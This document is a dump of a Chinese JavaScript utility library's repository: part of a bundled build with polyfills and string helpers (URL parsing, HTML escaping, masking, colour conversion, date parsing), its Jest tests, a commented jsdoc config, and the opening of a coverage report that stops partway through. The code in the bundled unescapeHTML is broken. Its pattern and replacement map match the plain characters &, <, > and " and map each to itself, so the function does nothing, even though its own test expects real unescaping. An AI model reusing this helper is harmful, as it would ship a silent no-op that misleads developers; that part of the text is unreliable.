var check = function (O, proto) {
_anObject(O);
if (!_isObject(proto) && proto !== null) throw TypeError(proto + ": can't set as prototype!");
};
var _setProto = {
set: Object.setPrototypeOf || ('__proto__' in {} ? // eslint-disable-line
function (test, buggy, set) {
try {
set = _ctx(Function.call, _objectGopd.f(Object.prototype, '__proto__').set, 2);
set(test, []);
buggy = !(test instanceof Array);
} catch (e) {
buggy = true;
}
return function setPrototypeOf(O, proto) {
check(O, proto);
if (buggy) O.__proto__ = proto;else set(O, proto);
return O;
};
}({}, false) : undefined),
check: check
};
_export(_export.S, 'Object', {
setPrototypeOf: _setProto.set
});
var setPrototypeOf = _core.Object.setPrototypeOf;
var setPrototypeOf$1 = setPrototypeOf;
var setPrototypeOf$2 = createCommonjsModule(function (module) {
function _setPrototypeOf(o, p) {
module.exports = _setPrototypeOf = setPrototypeOf$1 || function _setPrototypeOf(o, p) {
o.__proto__ = p;
return o;
};
return _setPrototypeOf(o, p);
}
module.exports = _setPrototypeOf;
});
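// Babel's _setPrototypeOf helper: prefers the (possibly polyfilled)
// Object.setPrototypeOf imported above and falls back to assigning __proto__.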
var construct$3 = createCommonjsModule(function (module) {
function isNativeReflectConstruct() {
if (typeof Reflect === "undefined" || !construct$2) return false;
if (construct$2.sham) return false;
if (typeof Proxy === "function") return true;
try {
Date.prototype.toString.call(construct$2(Date, [], function () {}));
return true;
} catch (e) {
return false;
}
}
function _construct(Parent, args, Class) {
if (isNativeReflectConstruct()) {
module.exports = _construct = construct$2;
} else {
module.exports = _construct = function _construct(Parent, args, Class) {
var a = [null];
a.push.apply(a, args);
var Constructor = Function.bind.apply(Parent, a);
var instance = new Constructor();
if (Class) setPrototypeOf$2(instance, Class.prototype);
return instance;
};
}
return _construct.apply(null, arguments);
}
module.exports = _construct;
});
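// Babel's _construct helper: uses Reflect.construct when it is natively
// available, otherwise emulates `new Parent(...args)` via Function.bind and, if
// a subclass is given, repoints the new instance's prototype to it.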
var _stringWs = '\x09\x0A\x0B\x0C\x0D\x20\xA0\u1680\u180E\u2000\u2001\u2002\u2003' + '\u2004\u2005\u2006\u2007\u2008\u2009\u200A\u202F\u205F\u3000\u2028\u2029\uFEFF';
var space = '[' + _stringWs + ']';
var non = '\u200b\u0085';
var ltrim = RegExp('^' + space + space + '*');
var rtrim = RegExp(space + space + '*$');
var exporter = function (KEY, exec, ALIAS) {
var exp = {};
var FORCE = _fails(function () {
return !!_stringWs[KEY]() || non[KEY]() != non;
});
var fn = exp[KEY] = FORCE ? exec(trim) : _stringWs[KEY];
if (ALIAS) exp[ALIAS] = fn;
_export(_export.P + _export.F * FORCE, 'String', exp);
}; // 1 -> String#trimLeft
// 2 -> String#trimRight
// 3 -> String#trim
var trim = exporter.trim = function (string, TYPE) {
string = String(_defined(string));
if (TYPE & 1) string = string.replace(ltrim, '');
if (TYPE & 2) string = string.replace(rtrim, '');
return string;
};
var _stringTrim = exporter;
var $parseInt = _global.parseInt;
var $trim = _stringTrim.trim;
var hex = /^[-+]?0[xX]/;
var _parseInt = $parseInt(_stringWs + '08') !== 8 || $parseInt(_stringWs + '0x16') !== 22 ? function parseInt(str, radix) {
var string = $trim(String(str), 3);
return $parseInt(string, radix >>> 0 || (hex.test(string) ? 16 : 10));
} : $parseInt;
_export(_export.G + _export.F * (parseInt != _parseInt), {
parseInt: _parseInt
});
var _parseInt$1 = _core.parseInt;
var _parseInt$2 = _parseInt$1;
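// core-js parseInt patch: trims the full Unicode whitespace list and forces a
// sensible radix (16 for 0x-prefixed strings, otherwise 10) on engines whose
// native parseInt gets either case wrong.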
/**
* 获取字符串的字节长度
* @function byteSize
* @param {string} str - 字符串
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
var byteSize = function byteSize(str) {
return new Blob([str]).size;
};
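// byteSize works because Blob measures its contents in UTF-8, so a CJK
// character such as '日' counts as 3 bytes while an ASCII character counts as 1.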
/**
* 反转字符串
* @function reverseString
* @param {string} str - 字符串
* @return {str}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
var reverseString = function reverseString(str) {
return toConsumableArray(str).reverse().join('');
};
/**
* 向URL追加参数
* @function stringifyURL
* @param {string} url - URL路径
* @param {object} params - 参数对象
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
var stringifyURL = function stringifyURL(url, params) {
url += /\?/.test(url) ? '&' : '?';
return url += keys$1(params).map(function (key) {
return "".concat(key, "=").concat(params[key]);
}).join('&');
};
/**
* 解析URL参数
* @function parseURL
* @param {string} url - 字符串
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
var parseURL = function parseURL(url) {
var arr = url.match(/([^?=&]+)(=([^&]*))/g) || [];
return arr.reduce(function (a, v) {
return a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1), a;
}, {});
};
/**
* 移除字符串中的HTML标签
* @function removeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<p>这是<em>一个</em>段落。</p>'
* U.removeHTML(str)
* // => '这是一个段落。'
*/
var removeHTML = function removeHTML(str) {
return str.replace(/<[^>]*>/g, '');
};
/**
* 转义特殊字符
* @function escapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.escapeHTML(str)
 * // => '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
*/
var escapeHTML = function escapeHTML(str) {
return str.replace(/[&<>"]/g, function (tag) {
return {
'&': '&amp;',
'<': '&lt;',
'>': '&gt;',
'"': '&quot;'
}[tag] || tag;
});
};
/**
* 反转义特殊字符
* @function unescapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
 * const str = '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
* U.unescapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
var unescapeHTML = function unescapeHTML(str) {
return str.replace(/&|<|>|"/g, function (tag) {
return {
'&': '&',
'<': '<',
'>': '>',
'"': '"'
}[tag] || tag;
});
};
/**
* 使用指定的掩码字符替换start~end之间的所有字符
* @function mask
* @param {string|number} str - 字符串
* @param {number} [start=0] - 可选,开始位置,默认为0(即字符串开头)
* @param {number} [end=0] - 可选,结束位置,默认为0(即字符串结尾)
* @param {string} [mask='*'] - 可选,掩码字符,默认为'*'号
* @return {string}
* @example
* U.mask(123456789) // => *********
* U.mask(123456789, 3) // => 123******
* U.mask(str, 0, 4) // => *****6789
* U.mask(str, 3, 4) // => 123**6789
* U.mask(str, 3, 4, '&') // => 123&&6789
*/
var mask = function mask(str) {
var start = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 0;
var end = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : 0;
var mask = arguments.length > 3 && arguments[3] !== undefined ? arguments[3] : '*';
return toConsumableArray("".concat(str)).map(function (v, i) {
return i >= start && i < "".concat(str).length - end ? mask : v;
}).join('');
};
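// In mask, `start` counts from the left and `end` from the right: indices in
// [start, length - end) are replaced with the mask character, which is why
// mask(123456789, 3, 4) keeps the first three and last four digits.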
/**
* 随机生成16进制色值
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
var randomHex = function randomHex() {
return '#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6);
};
/**
* 随机生成rgba色值
* @function randomRgba
* @param {number} [min=0] - 可选,最小色阶
* @param {number} [max=256] - 可选,最大色阶
* @param {number} [alpha=1] - 可选,透明度
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
var randomRgba = function randomRgba() {
var min = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 0;
var max = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 256;
var alpha = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : 1;
var color = from_1$1({
length: 3
}).reduce(function (acc) {
return [].concat(toConsumableArray(acc), [Math.floor(random(min, max))]);
}, []).concat(alpha ? [alpha] : [0]).join(',');
return "rgba(".concat(color, ")");
};
/**
* 将3位16进制色值转为6位
* @function extendHex
* @param {string} shortHex - 字符串
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
var extendHex = function extendHex(shortHex) {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0).split('').map(function (x) {
return x + x;
}).join('');
};
/**
* 将16进制hex色值转为rgb(或rgba)色值
* @function hexToRGB
* @param {string} hex - 字符串,16进制hex色值
* @param {number} alpha - 可选,色彩透明度
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
var hexToRGB = function hexToRGB(hex, alpha) {
var hasAlpha = !isUndefined(alpha);
var result = hex.slice(hex.startsWith('#') ? 1 : 0);
if (result.length === 3) result = toConsumableArray(result).map(function (s) {
return s + s;
}).join('');
result = result.match(/[0-9a-f]{2}/gi).map(function (s) {
return _parseInt$2(s, 16);
}).concat(hasAlpha ? [alpha] : []).join(',');
return "rgb".concat(hasAlpha ? 'a' : '', "(").concat(result, ")");
};
/**
* 将rgb(或rgba)色值转为16进制hex色值
* @function RGBToHex
* @param {string} rgb - 字符串,rgb(或rgba)色值
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
var RGBToHex = function RGBToHex(rgb) {
return '#' + rgb.match(/\d{1,3}/g).slice(0, 3).map(function (s) {
return Number(s).toString(16).padStart(2, '0');
}).join('');
};
/**
* 解析cookie字符串
* @function parseCookie
* @param {string} str - 字符串
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
var parseCookie = function parseCookie(str) {
return str.split(';').map(function (v) {
return v.split('=');
}).reduce(function (acc, v) {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim());
return acc;
}, {});
};
/**
* 字符串转日期对象
* @function stringToDate
* @param {string} str - 字符串
* @return {date}
* @example
* U.stringToDate('2019/5-06').toString()
* // => Mon May 06 2019 00:00:00 GMT+0800 (中国标准时间)
*
* U.stringToDate('2019-5-06 20:21:22:500').toString()
* // => Mon May 06 2019 20:21:22 GMT+0800 (中国标准时间)
*/
var stringToDate = function stringToDate(str) {
var defs = [0, 1, 1, 0, 0, 0];
var args = str.split(/[^0-9]+/).map(function (v, i) {
var val = Number(v) || defs[i];
return i === 1 ? val - 1 : val;
});
return construct$3(Date, toConsumableArray(args));
};
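// stringToDate splits on runs of non-digits, fills missing fields from `defs`
// (month and day default to 1) and subtracts 1 from the month because the Date
// constructor expects zero-based months.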
/**
* 驼峰字符串转横线连接字符串
* @function camelToDash
* @param {string} str - 驼峰字符串
* @return {string}
* @example
* U.camelToDash('camelCase')
 * // => 'camel-case'
*/
var camelToDash = function camelToDash(str) {
return str.replace(/([A-Z])/g, "-$1").toLowerCase();
};
/**
* 横线连接字符串转驼峰字符串
* @function dashToCamel
* @param {string} str - 横线连接字符串
* @return {string}
* @example
 * U.dashToCamel('dash-case')
 * // => 'dashCase'
*/
var dashToCamel = function dashToCamel(str) {
return str.replace(/\-(\w)/g, function (a, l) {
return l.toUpperCase();
});
};
var usually = /*#__PURE__*/Object.freeze({
getType: getType,
isNumber: isNumber,
isString: isString,
isNull: isNull,
isUndefined: isUndefined,
isBoolean: isBoolean,
isSymbol: isSymbol$1,
isFunction: isFunction,
isArray: isArray$2,
isObject: isObject,
isInt: isInt,
toThousands: toThousands,
inRange: inRange,
round: round,
random: random,
keepFixed: keepFixed,
average: average,
once: once,
debounce: debounce,
throttle: throttle,
pipe: pipe,
dateFormat: dateFormat,
getMonthDays: getMonthDays,
getWeekday: getWeekday,
prevMonth: prevMonth,
nextMonth: nextMonth,
isAfterDate: isAfterDate,
spreadDate: spreadDate,
lastItem: lastItem,
uniqueItems: uniqueItems,
uniqueItemsBy: uniqueItemsBy,
repeatItems: repeatItems,
initArray: initArray,
mapObject: mapObject,
averageBy: averageBy,
maxBy: maxBy,
minBy: minBy,
chunk: chunk,
deepClone: deepClone,
deepFreeze: deepFreeze,
renameKeys: renameKeys,
omit: omit,
isEmpty: isEmpty,
get: get,
byteSize: byteSize,
reverseString: reverseString,
stringifyURL: stringifyURL,
parseURL: parseURL,
removeHTML: removeHTML,
escapeHTML: escapeHTML,
unescapeHTML: unescapeHTML,
mask: mask,
randomHex: randomHex,
randomRgba: randomRgba,
extendHex: extendHex,
hexToRGB: hexToRGB,
RGBToHex: RGBToHex,
parseCookie: parseCookie,
stringToDate: stringToDate,
camelToDash: camelToDash,
dashToCamel: dashToCamel
});
function ownKeys$1(object, enumerableOnly) { var keys = keys$1(object); if (getOwnPropertySymbols$1) { keys.push.apply(keys, getOwnPropertySymbols$1(object)); } if (enumerableOnly) keys = keys.filter(function (sym) { return getOwnPropertyDescriptor$1(object, sym).enumerable; }); return keys; }
function _objectSpread$1(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys$1(source, true).forEach(function (key) { defineProperty$3(target, key, source[key]); }); } else if (getOwnPropertyDescriptors$1) { defineProperties$1(target, getOwnPropertyDescriptors$1(source)); } else { ownKeys$1(source).forEach(function (key) { defineProperty$1(target, key, getOwnPropertyDescriptor$1(source, key)); }); } } return target; }
var usually$1 = _objectSpread$1({
version: version
}, usually);
return usually$1;
})));
<|start_filename|>test/string.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('byteSize', () => {
let s = U.byteSize('日')
expect(s).toBe(3)
s = U.byteSize('12')
expect(s).toBe(2)
s = U.byteSize('hello')
expect(s).toBe(5)
})
test('reverseString', () => {
let s = U.reverseString('hello!')
expect(s).toBe('!olleh')
})
test('stringifyURL', () => {
let s = U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
expect(s).toBe('https://www.google.com/?name=john&age=30')
s = U.stringifyURL('https://www.google.com/?name=john', {age: 30})
expect(s).toBe('https://www.google.com/?name=john&age=30')
})
test('parseURL', () => {
let s = U.parseURL('http://url.com/page?name=Adam&surname=Smith')
expect(s).toEqual({name: 'Adam', surname: 'Smith'})
s = U.parseURL('https://www.google.com/')
expect(s).toEqual({})
})
test('removeHTML', () => {
let s = U.removeHTML('<p>这是<em>一个</em>段落。</p>')
expect(s).toBe('这是一个段落。')
})
test('escapeHTML', () => {
expect(U.escapeHTML).toBeInstanceOf(Function)
let s = U.escapeHTML('<a href="#">you & me</a>')
  expect(s).toBe('&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;')
})
test('unescapeHTML', () => {
expect(U.unescapeHTML).toBeInstanceOf(Function)
  let s = U.unescapeHTML('&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;')
expect(s).toBe('<a href="#">you & me</a>')
})
test('mask', () => {
let s = U.mask(123456789)
expect(s).toBe('*********')
s = U.mask(123456789, 3)
expect(s).toBe('123******')
s = U.mask(123456789, 0, 4)
expect(s).toBe('*****6789')
s = U.mask(123456789, 3, 4)
expect(s).toBe('123**6789')
s = U.mask(123456789, 3, 4, '&')
expect(s).toBe('123&&6789')
s = U.mask(123456789, 5, 6)
expect(s).toBe('123456789')
s = U.mask('123456789', 0, 0, '&')
expect(s).toBe('&&&&&&&&&')
})
test('randomHex', () => {
expect(U.randomHex).toBeInstanceOf(Function)
})
test('randomRgba', () => {
expect(U.randomRgba).toBeInstanceOf(Function)
expect(typeof U.randomRgba()).toBe('string')
expect(U.randomRgba(120, 121, 0.5)).toBe('rgba(120,120,120,0.5)')
})
test('extendHex', () => {
let hex = U.extendHex('#03f')
expect(hex).toBe('#0033ff')
hex = U.extendHex('50a')
expect(hex).toBe('#5500aa')
})
test('hexToRGB', () => {
let r = U.hexToRGB('#e5f')
expect(r).toBe('rgb(238,85,255)')
r = U.hexToRGB('e5f')
expect(r).toBe('rgb(238,85,255)')
r = U.hexToRGB('#ee55ff', 0.5)
expect(r).toBe('rgba(238,85,255,0.5)')
})
test('RGBToHex', () => {
let r = U.RGBToHex('rgb(238,85,255)')
expect(r).toBe('#ee55ff')
r = U.RGBToHex('rgba(238,85,255,0.5)')
expect(r).toBe('#ee55ff')
})
test('parseCookie', () => {
const cookie = U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
expect(cookie).toEqual({taken: 'bar', equation: 'E=mc^2'})
})
test('stringToDate', () => {
expect(U.stringToDate).toBeInstanceOf(Function)
let r = U.stringToDate('2019/5-06').toString()
expect(r).toBe('Mon May 06 2019 00:00:00 GMT+0800 (GMT+08:00)')
r = U.stringToDate('2019-5-06 20:21:22:500').toString()
expect(r).toBe('Mon May 06 2019 20:21:22 GMT+0800 (GMT+08:00)')
r = U.stringToDate('2019年2月').toString()
expect(r).toBe('Fri Feb 01 2019 00:00:00 GMT+0800 (GMT+08:00)')
})
test('camelToDash', () => {
expect(U.camelToDash).toBeInstanceOf(Function)
const s = U.camelToDash('camelCase')
expect(s).toBe('camel-case')
})
test('dashToCamel', () => {
expect(U.dashToCamel).toBeInstanceOf(Function)
const s = U.dashToCamel('dash-case')
expect(s).toBe('dashCase')
})
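
// Additional test, not part of the original suite: parseURL's reduce keeps the
// last occurrence of a repeated key, so the final value should win.
test('parseURL with repeated keys', () => {
  const s = U.parseURL('http://url.com/page?a=1&a=2')
  expect(s).toEqual({a: '2'})
})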
<|start_filename|>jsdoc.config.json<|end_filename|>
{
"tags": {
"allowUnknownTags": true, // 允许使用无法识别的标签
"dictionaries": ["jsdoc", "closure"] // 启用两个标准JSDoc标签和closure标签
},
"source": {
"include": "./src/", // 可选的路径数组,JSDoc应该为它们生成文档。
"exclude": ["./src/index.js"], // 可选的路径数组,JSDoc应该忽略的路径。
"includePattern": ".js$", // 一个可选的字符串,解释为一个正则表达式。此处只有js文件将会被JSDoc处理
"excludePattern": "(^|\\/|\\\\)_" // 一个可选的字符串,解释为一个正则表达式。任何以下划线开始的文件或目录都将被JSDoc忽略
},
"opts": { // 设置的命令行选项
"template": "node_modules/docdash", // 设置模板,此处使用docdash模板node_modules/docdash
"encoding": "utf8", // 字符编码格式
"destination": "./docs/", // 文档输出目录
"recurse": true, // 是否递归查找
"verbose": true
// "tutorials": "path/to/tutorials" // tutorials的配置文件
},
"plugins": [], // 无插件加载
"templates": { // 模板设置,以下模板使用@link标签呈现在纯文本
"cleverLinks": false,
"monospaceLinks": false
},
"docdash": { // 配置模板
"search": [true], // 是否启用搜索框
"sort": false, // 是否排序
"collapse": false, // 是否折叠导航
"openGraph": { // Open Graph options (mostly for Facebook and other sites to easily extract meta information)
"title": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Title of the website
"type": "website", // Type of the website
"image": "", // Main image/logo
"site_name": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Site name
"url": "http://www.jofun.win/usually/" // Main canonical URL for the main page of the site
},
"meta": { // Meta information options (mostly for search engines that have not indexed your site yet)
"title": "usuallyjs是一个面向现代 Web 开发的 JavaScript 实用函数库", // Also will be used as postfix to actualy page title, prefixed with object/document name
"description": "一个面向现代 Web 开发的 JavaScript 实用函数库", // Description of overal contents of your website
"keyword": "JavaScript,vue,react,web,函数库,实用函数" // Keywords for search engines
}
}
}
<|start_filename|>src/index.js<|end_filename|>
export * from './type'
export * from './number'
export * from './function'
export * from './date'
export * from './array'
export * from './object'
export * from './string'
<|start_filename|>coverage/lcov-report/string.js.html<|end_filename|>
<!doctype html>
<html lang="en">
<head>
<title>Code coverage report for string.js</title>
<meta charset="utf-8" />
<link rel="stylesheet" href="prettify.css" />
<link rel="stylesheet" href="base.css" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<style type='text/css'>
.coverage-summary .sorter {
background-image: url(sort-arrow-sprite.png);
}
</style>
</head>
<body>
<div class='wrapper'>
<div class='pad1'>
<h1>
<a href="index.html">All files</a> string.js
</h1>
<div class='clearfix'>
<div class='fl pad1y space-right2'>
<span class="strong">98.33% </span>
<span class="quiet">Statements</span>
<span class='fraction'>59/60</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">91.18% </span>
<span class="quiet">Branches</span>
<span class='fraction'>31/34</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">96.77% </span>
<span class="quiet">Functions</span>
<span class='fraction'>30/31</span>
</div>
<div class='fl pad1y space-right2'>
<span class="strong">100% </span>
<span class="quiet">Lines</span>
<span class='fraction'>46/46</span>
</div>
</div>
<p class="quiet">
Press <em>n</em> or <em>j</em> to go to the next uncovered block, <em>b</em>, <em>p</em> or <em>k</em> for the previous block.
</p>
</div>
<div class='status-line high'></div>
<pre><table class="coverage">
<tr><td class="line-count quiet"><a name='L1'></a><a href='#L1'>1</a>
<a name='L2'></a><a href='#L2'>2</a>
<a name='L3'></a><a href='#L3'>3</a>
<a name='L4'></a><a href='#L4'>4</a>
<a name='L5'></a><a href='#L5'>5</a>
<a name='L6'></a><a href='#L6'>6</a>
<a name='L7'></a><a href='#L7'>7</a>
<a name='L8'></a><a href='#L8'>8</a>
<a name='L9'></a><a href='#L9'>9</a>
<a name='L10'></a><a href='#L10'>10</a>
<a name='L11'></a><a href='#L11'>11</a>
<a name='L12'></a><a href='#L12'>12</a>
<a name='L13'></a><a href='#L13'>13</a>
<a name='L14'></a><a href='#L14'>14</a>
<a name='L15'></a><a href='#L15'>15</a>
<a name='L16'></a><a href='#L16'>16</a>
<a name='L17'></a><a href='#L17'>17</a>
<a name='L18'></a><a href='#L18'>18</a>
<a name='L19'></a><a href='#L19'>19</a>
<a name='L20'></a><a href='#L20'>20</a>
<a name='L21'></a><a href='#L21'>21</a>
<a name='L22'></a><a href='#L22'>22</a>
<a name='L23'></a><a href='#L23'>23</a>
<a name='L24'></a><a href='#L24'>24</a>
<a name='L25'></a><a href='#L25'>25</a>
<a name='L26'></a><a href='#L26'>26</a>
<a name='L27'></a><a href='#L27'>27</a>
<a name='L28'></a><a href='#L28'>28</a>
<a name='L29'></a><a href='#L29'>29</a>
<a name='L30'></a><a href='#L30'>30</a>
<a name='L31'></a><a href='#L31'>31</a>
<a name='L32'></a><a href='#L32'>32</a>
<a name='L33'></a><a href='#L33'>33</a>
<a name='L34'></a><a href='#L34'>34</a>
<a name='L35'></a><a href='#L35'>35</a>
<a name='L36'></a><a href='#L36'>36</a>
<a name='L37'></a><a href='#L37'>37</a>
<a name='L38'></a><a href='#L38'>38</a>
<a name='L39'></a><a href='#L39'>39</a>
<a name='L40'></a><a href='#L40'>40</a>
<a name='L41'></a><a href='#L41'>41</a>
<a name='L42'></a><a href='#L42'>42</a>
<a name='L43'></a><a href='#L43'>43</a>
<a name='L44'></a><a href='#L44'>44</a>
<a name='L45'></a><a href='#L45'>45</a>
<a name='L46'></a><a href='#L46'>46</a>
<a name='L47'></a><a href='#L47'>47</a>
<a name='L48'></a><a href='#L48'>48</a>
<a name='L49'></a><a href='#L49'>49</a>
<a name='L50'></a><a href='#L50'>50</a>
<a name='L51'></a><a href='#L51'>51</a>
<a name='L52'></a><a href='#L52'>52</a>
<a name='L53'></a><a href='#L53'>53</a>
<a name='L54'></a><a href='#L54'>54</a>
<a name='L55'></a><a href='#L55'>55</a>
<a name='L56'></a><a href='#L56'>56</a>
<a name='L57'></a><a href='#L57'>57</a>
<a name='L58'></a><a href='#L58'>58</a>
<a name='L59'></a><a href='#L59'>59</a>
<a name='L60'></a><a href='#L60'>60</a>
<a name='L61'></a><a href='#L61'>61</a>
<a name='L62'></a><a href='#L62'>62</a>
<a name='L63'></a><a href='#L63'>63</a>
<a name='L64'></a><a href='#L64'>64</a>
<a name='L65'></a><a href='#L65'>65</a>
<a name='L66'></a><a href='#L66'>66</a>
<a name='L67'></a><a href='#L67'>67</a>
<a name='L68'></a><a href='#L68'>68</a>
<a name='L69'></a><a href='#L69'>69</a>
<a name='L70'></a><a href='#L70'>70</a>
<a name='L71'></a><a href='#L71'>71</a>
<a name='L72'></a><a href='#L72'>72</a>
<a name='L73'></a><a href='#L73'>73</a>
<a name='L74'></a><a href='#L74'>74</a>
<a name='L75'></a><a href='#L75'>75</a>
<a name='L76'></a><a href='#L76'>76</a>
<a name='L77'></a><a href='#L77'>77</a>
<a name='L78'></a><a href='#L78'>78</a>
<a name='L79'></a><a href='#L79'>79</a>
<a name='L80'></a><a href='#L80'>80</a>
<a name='L81'></a><a href='#L81'>81</a>
<a name='L82'></a><a href='#L82'>82</a>
<a name='L83'></a><a href='#L83'>83</a>
<a name='L84'></a><a href='#L84'>84</a>
<a name='L85'></a><a href='#L85'>85</a>
<a name='L86'></a><a href='#L86'>86</a>
<a name='L87'></a><a href='#L87'>87</a>
<a name='L88'></a><a href='#L88'>88</a>
<a name='L89'></a><a href='#L89'>89</a>
<a name='L90'></a><a href='#L90'>90</a>
<a name='L91'></a><a href='#L91'>91</a>
<a name='L92'></a><a href='#L92'>92</a>
<a name='L93'></a><a href='#L93'>93</a>
<a name='L94'></a><a href='#L94'>94</a>
<a name='L95'></a><a href='#L95'>95</a>
<a name='L96'></a><a href='#L96'>96</a>
<a name='L97'></a><a href='#L97'>97</a>
<a name='L98'></a><a href='#L98'>98</a>
<a name='L99'></a><a href='#L99'>99</a>
<a name='L100'></a><a href='#L100'>100</a>
<a name='L101'></a><a href='#L101'>101</a>
<a name='L102'></a><a href='#L102'>102</a>
<a name='L103'></a><a href='#L103'>103</a>
<a name='L104'></a><a href='#L104'>104</a>
<a name='L105'></a><a href='#L105'>105</a>
<a name='L106'></a><a href='#L106'>106</a>
<a name='L107'></a><a href='#L107'>107</a>
<a name='L108'></a><a href='#L108'>108</a>
<a name='L109'></a><a href='#L109'>109</a>
<a name='L110'></a><a href='#L110'>110</a>
<a name='L111'></a><a href='#L111'>111</a>
<a name='L112'></a><a href='#L112'>112</a>
<a name='L113'></a><a href='#L113'>113</a>
<a name='L114'></a><a href='#L114'>114</a>
<a name='L115'></a><a href='#L115'>115</a>
<a name='L116'></a><a href='#L116'>116</a>
<a name='L117'></a><a href='#L117'>117</a>
<a name='L118'></a><a href='#L118'>118</a>
<a name='L119'></a><a href='#L119'>119</a>
<a name='L120'></a><a href='#L120'>120</a>
<a name='L121'></a><a href='#L121'>121</a>
<a name='L122'></a><a href='#L122'>122</a>
<a name='L123'></a><a href='#L123'>123</a>
<a name='L124'></a><a href='#L124'>124</a>
<a name='L125'></a><a href='#L125'>125</a>
<a name='L126'></a><a href='#L126'>126</a>
<a name='L127'></a><a href='#L127'>127</a>
<a name='L128'></a><a href='#L128'>128</a>
<a name='L129'></a><a href='#L129'>129</a>
<a name='L130'></a><a href='#L130'>130</a>
<a name='L131'></a><a href='#L131'>131</a>
<a name='L132'></a><a href='#L132'>132</a>
<a name='L133'></a><a href='#L133'>133</a>
<a name='L134'></a><a href='#L134'>134</a>
<a name='L135'></a><a href='#L135'>135</a>
<a name='L136'></a><a href='#L136'>136</a>
<a name='L137'></a><a href='#L137'>137</a>
<a name='L138'></a><a href='#L138'>138</a>
<a name='L139'></a><a href='#L139'>139</a>
<a name='L140'></a><a href='#L140'>140</a>
<a name='L141'></a><a href='#L141'>141</a>
<a name='L142'></a><a href='#L142'>142</a>
<a name='L143'></a><a href='#L143'>143</a>
<a name='L144'></a><a href='#L144'>144</a>
<a name='L145'></a><a href='#L145'>145</a>
<a name='L146'></a><a href='#L146'>146</a>
<a name='L147'></a><a href='#L147'>147</a>
<a name='L148'></a><a href='#L148'>148</a>
<a name='L149'></a><a href='#L149'>149</a>
<a name='L150'></a><a href='#L150'>150</a>
<a name='L151'></a><a href='#L151'>151</a>
<a name='L152'></a><a href='#L152'>152</a>
<a name='L153'></a><a href='#L153'>153</a>
<a name='L154'></a><a href='#L154'>154</a>
<a name='L155'></a><a href='#L155'>155</a>
<a name='L156'></a><a href='#L156'>156</a>
<a name='L157'></a><a href='#L157'>157</a>
<a name='L158'></a><a href='#L158'>158</a>
<a name='L159'></a><a href='#L159'>159</a>
<a name='L160'></a><a href='#L160'>160</a>
<a name='L161'></a><a href='#L161'>161</a>
<a name='L162'></a><a href='#L162'>162</a>
<a name='L163'></a><a href='#L163'>163</a>
<a name='L164'></a><a href='#L164'>164</a>
<a name='L165'></a><a href='#L165'>165</a>
<a name='L166'></a><a href='#L166'>166</a>
<a name='L167'></a><a href='#L167'>167</a>
<a name='L168'></a><a href='#L168'>168</a>
<a name='L169'></a><a href='#L169'>169</a>
<a name='L170'></a><a href='#L170'>170</a>
<a name='L171'></a><a href='#L171'>171</a>
<a name='L172'></a><a href='#L172'>172</a>
<a name='L173'></a><a href='#L173'>173</a>
<a name='L174'></a><a href='#L174'>174</a>
<a name='L175'></a><a href='#L175'>175</a>
<a name='L176'></a><a href='#L176'>176</a>
<a name='L177'></a><a href='#L177'>177</a>
<a name='L178'></a><a href='#L178'>178</a>
<a name='L179'></a><a href='#L179'>179</a>
<a name='L180'></a><a href='#L180'>180</a>
<a name='L181'></a><a href='#L181'>181</a>
<a name='L182'></a><a href='#L182'>182</a>
<a name='L183'></a><a href='#L183'>183</a>
<a name='L184'></a><a href='#L184'>184</a>
<a name='L185'></a><a href='#L185'>185</a>
<a name='L186'></a><a href='#L186'>186</a>
<a name='L187'></a><a href='#L187'>187</a>
<a name='L188'></a><a href='#L188'>188</a>
<a name='L189'></a><a href='#L189'>189</a>
